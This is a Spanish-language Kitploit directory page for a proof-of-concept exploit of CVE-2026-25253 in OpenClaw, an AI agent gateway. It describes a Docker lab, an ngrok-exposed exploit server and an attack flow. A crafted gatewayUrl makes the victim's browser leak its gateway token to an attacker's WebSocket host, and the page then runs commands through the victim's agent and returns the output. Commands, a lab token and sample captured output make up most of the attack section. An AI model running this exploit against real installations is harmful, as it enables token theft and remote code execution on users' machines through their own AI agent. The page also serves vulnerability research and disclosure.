Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-25253 — Exfiltración de tokens de autenticación OpenClaw | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2026-25253
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

Exfiltración de tokens de autenticación OpenClaw

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-25253 OpenClaw RCE en 1 clic

★ CVE-2026-25253 PoC de OpenClaw RCE en 1 clic ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descripción

CVE-2026-25253 : Vulnerabilidad de Exfiltración del Token de Autenticación de OpenClaw

descripción: OpenClaw (también conocido como clawdbot o Moltbot) anterior a v2026.1.29 permite a los atacantes exfiltrar un token de autenticación de gateway almacenado proporcionando un valor query-string gatewayUrl manipulado a la interfaz de Control, que establece automáticamente una conexión WebSocket sin validación ni confirmación del usuario. Esto puede llevar a acceso no autorizado al gateway y ejecución remota de código en 1 clic.

Requisitos

  • Docker (Docker Desktop en Windows)
  • Python 3.x (lado atacante)

Archivos

  • Dockerfile — construir el entorno vulnerable de OpenClaw
  • templates/ — páginas web maliciosas utilizadas por el exploit
  • config.txt — configuración de OpenClaw utilizada en el entorno víctima
  • exploit.py — servidor del exploit
  • requirements.txt — dependencias del PoC

Configuración del Entorno

  1. Construir la imagen Docker
root@kitploit:~
docker build -t openclaw-vuln .
  1. Ejecutar entorno (Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Crear túnel SSH
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Password: openclawlab
  1. Acceder a la interfaz de Control de OpenClaw Abrir la siguiente URL en el navegador
root@kitploit:~
http://127.0.0.1:18789/
  1. Ingresar el token de gateway d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Hacer clic en Conectar
  3. Abrir la pestaña Config
  4. pegar el contenido de config.txt
  5. Reemplazar el campo de clave API con tu clave API de OpenAI
  6. Guardar la configuración
  7. Confirmar que el agente responde normalmente

Prueba de Concepto (PoC)

  1. Instalar dependencias (lado atacante)
root@kitploit:~
pip3 install -r requirements.txt
  1. Exponer el servidor del exploit sobre HTTPS
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copiar el nombre de host de reenvío generado
  1. Ejecutar servidor del exploit
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Ejemplo:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Desencadenar el ataque
  1. Abrir la página maliciosa expuesta por el servidor del exploit
  2. Simular la interacción de la víctima con la página
  3. Desencadenar el flujo del exploit desde el navegador

Flujo del Ataque

  1. Una URL maliciosa cambia el gatewayUrl de la interfaz de Control de la víctima
  2. El navegador se conecta automáticamente al punto final WebSocket controlado por el atacante
  3. El token de autenticación del gateway se filtra al atacante
  4. La página maliciosa utiliza el token robado para abrir una nueva conexión WebSocket al gateway local de OpenClaw de la víctima
  5. Se envía una solicitud de ejecución de comandos a través del agente
  6. El resultado de la ejecución se devuelve al servidor del atacante

Resultado Esperado

  • El navegador de la víctima es redirigido al flujo WebSocket malicioso
  • El token de autenticación del gateway es capturado por el atacante
  • El atacante puede enviar una solicitud de ejecución de comandos a través de OpenClaw
  • La salida del comando se devuelve al servidor del atacante

Ejemplo de Salida

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Notas

  • Este PoC está dirigido a OpenClaw 2026.1.24-1
  • La cadena del exploit depende del manejo vulnerable de gatewayUrl en la interfaz de Control
  • Para el acceso remoto de la víctima, la página maliciosa debe servirse sobre HTTPS
  • El gateway local de OpenClaw se alcanza a través del navegador de la víctima como puente

EQST Insight

Publicamos análisis de CVE y malware una vez al mes. Si estás interesado, sigue los enlaces a continuación para revisar nuestras publicaciones.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Descargar herramienta